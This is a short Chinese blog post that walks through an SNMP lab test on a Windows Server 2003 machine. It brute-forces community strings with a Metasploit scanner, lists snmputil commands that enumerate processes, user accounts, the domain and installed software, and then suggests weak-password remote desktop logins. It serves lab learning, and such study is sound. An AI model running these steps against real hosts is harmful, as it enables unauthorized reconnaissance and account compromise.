一、环境搭建

搜索windows Server2003安装配置snmp 服务,按照提示来就行

二、利用

1.找出Coummunity Strings

利用于 auxiliary/scanner/snmp/snmp_login

use auxiliary/scanner/snmp/snmp_login
set rhosts 192.168.131.128
set STOP_ON_SUCCESS true
set threads 15
run

snmp简单测试-LMLPHP

snmptuil软件下载

在dos命令行下打开snmptuil开始刺探信息

snmputil walk 对方ip public .1.3.6.1.2.1.25.4.2.1.2 列出系统进程
snmputil walk 对方ip public .1.3.6.1.4.1.77.1.2.25.1.1 列系统用户列表
snmputil get 对方ip public .1.3.6.1.4.1.77.1.4.1.0 列出域名
snmputil walk 对方ip public .1.3.6.1.2.1.25.6.3.1.2 列出安装的软件
snmputil walk 对方ip public .1.3.6.1.2.1.1 列出系统信息

使用snmputil walk 192.168.131.128 public .1.3.6.1.4.1.77.1.2.25.1.1

可以看到有个test的用户,用nmap扫描可以发现靶机开了3389,尝试弱口令登录

snmp简单测试-LMLPHP

三、参考链接

http://www.freebuf.com/column/144144.html

新博客 http://www.dycsy.cn

05-04 06:31